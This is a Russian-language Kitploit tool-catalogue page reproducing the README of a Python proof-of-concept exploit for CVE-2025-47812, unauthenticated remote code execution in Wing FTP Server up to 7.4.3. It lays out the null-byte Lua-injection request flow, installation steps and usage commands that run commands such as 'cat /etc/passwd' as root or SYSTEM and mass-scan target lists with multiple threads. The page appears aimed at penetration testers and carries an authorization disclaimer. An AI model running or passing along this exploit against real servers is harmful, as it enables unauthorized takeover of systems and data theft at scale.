Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-471812-POC — Python PoC для CVE-2025-47812, неаутентифицированное удаленное выполнение кода в Wing FTP Server <= 7.4.3 через Lua-инъекцию с нулевым байтом в файлы сеансов | Kitploit
Инструменты/GitHubGitHub/d3vn0mi/cve-2025-471812-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubd3vn0mi/cve-2025-471812-poc

CVE-2025-471812-POC

Python PoC для CVE-2025-47812, неаутентифицированное удаленное выполнение кода в Wing FTP Server <= 7.4.3 через Lua-инъекцию с нулевым байтом в файлы сеансов

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
root@kitploit:~
     ____  _______   ___   __ ____  __  ___ ____
    / __ \|__  /  | / / | / / __ \/  |/  // _/
   / / / / /_ <| | / /| |/ / / / / /|_/ / / /
  / / /_/___/ /| |/ / |   / /_/ / /  / /_/ /
 /_____/____/ |___/  |_/  \____/_/  /_/____/

CVE-2025-47812 — Wing FTP Server <= 7.4.3 Неаутентифицированное удаленное выполнение кода

Эксплойт-доказательство концепции для CVE-2025-47812, уязвимости неаутентифицированного удаленного выполнения кода в Wing FTP Server версиях до 7.4.4.

Обзор уязвимости

ПолеДетали
CVECVE-2025-47812
Затронутые версииWing FTP Server <= 7.4.3
ТипНеаутентифицированное удаленное выполнение кода
Привилегииroot (Linux) / SYSTEM (Windows)
Вендорwftpserver.com
Автор оригиналаSheikh Mohammad Hasan aka 4m3rr0r
Модифицированоd3vn0mi

Корневая причина

Функция c_CheckUser() сервера Wing FTP обрезает имя пользователя по нулевому байту (%00) для целей аутентификации, но полное неочищенное имя пользователя — включая всё после нулевого байта — записывается в Lua-файл сессии. При обращении к аутентифицированному эндпоинту, такому как /dir.html, сервер выполняет этот файл сессии, что приводит к выполнению внедрённого Lua-кода с повышенными привилегиями.

Процесс эксплуатации

root@kitploit:~
1. POST /loginok.html
   username=anonymous%00]]<LUA_PAYLOAD>&password=

2. Сервер аутентифицирует "anonymous" (обрезано по нулевому байту)
   но записывает полную нагрузку в файл сессии → возвращает куку UID

3. GET /dir.html  (Cookie: UID=<extracted_uid>)
   Сервер загружает файл сессии → выполняет внедрённый Lua → RCE

Установка

root@kitploit:~
git clone https://github.com/d3vn0mi/cve_2025_471812_poc.git
cd cve_2025_471812_poc
pip install requests

Использование

Быстрая проверка уязвимости

root@kitploit:~
python3 exploit.py -u http://TARGET

Выполнить команду

root@kitploit:~
python3 exploit.py -u http://TARGET -c 'id'

Сканирование нескольких целей из файла

root@kitploit:~
python3 exploit.py -f targets.txt -o vulnerable.txt -t 8

Полные опции

root@kitploit:~
usage: exploit.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME]
                  [-P PASSWORD] [-v] [-o OUTPUT] [-l LOG_FILE]
                  [-t THREADS] [--timeout TIMEOUT] [--retries RETRIES]
                  [--no-verify]

target:
  -u, --url URL           URL одной цели (например, http://192.168.134.130)
  -f, --file FILE         Файл со списком целевых URL (по одному на строку, # для комментариев)

exploit options:
  -c, --command COMMAND   Команда для выполнения на удалённом сервере (включает подробный вывод)
  -U, --username USERNAME Имя пользователя для нагрузки эксплойта (по умолчанию: anonymous)
  -P, --password PASSWORD Пароль для нагрузки эксплойта (по умолчанию: пустой)

output:
  -v, --verbose           Включить подробное / отладочное логирование
  -o, --output OUTPUT     Сохранить уязвимые URL в этот файл
  -l, --log-file LOG_FILE Записывать подробный лог в этот файл

network:
  -t, --threads THREADS   Количество потоков для сканирования нескольких целей (по умолчанию: 1)
  --timeout TIMEOUT       Тайм-аут HTTP-запроса в секундах (по умолчанию: 15)
  --retries RETRIES       Количество повторных попыток при сбое соединения (по умолчанию: 2)
  --no-verify             Отключить проверку SSL-сертификата

Примеры

root@kitploit:~
# Проверка одной цели
python3 exploit.py -u http://192.168.1.10

# Выполнить 'whoami' и увидеть полный вывод
python3 exploit.py -u http://192.168.1.10 -c 'whoami'

# Сканировать список в 8 потоков, записать всё в файл лога
python3 exploit.py -f targets.txt -t 8 -l scan.log -o vuln.txt

# Использовать собственные учётные данные с отключённой проверкой SSL
python3 exploit.py -u https://10.0.0.5 -U admin -P secret -c 'cat /etc/passwd' --no-verify

# Режим подробного вывода для отладки
python3 exploit.py -u http://192.168.1.10 -v

Возможности

  • Структурированное логирование — Цветной консольный вывод (DEBUG/INFO/WARN/ERROR) + опциональное логирование в файл через --log-file
  • Многопоточное сканирование — Параллельное сканирование целей с помощью -t для больших списков
  • Повтор с экспоненциальной задержкой — Автоматический экспоненциальный бэкофф при сетевых сбоях (настраивается --retries)
  • Гибкость SSL — --no-verify для самоподписанных сертификатов
  • Пакетное сканирование — Файлы целей поддерживают комментарии # и автоматическое удаление дубликатов
  • Чистый вывод — Режим проверки уязвимости даёт простой результат VULNERABLE/NOT VULNERABLE; -c показывает полный вывод команды

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Используйте его только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение. Несанкционированный доступ к компьютерным системам является незаконным. Авторы не несут ответственности за любое неправильное использование или ущерб, причинённый этим инструментом.

Авторство

  • Оригинальный эксплойт от 4m3rr0r
  • Модифицирован и улучшен d3vn0mi
Скачать инструмент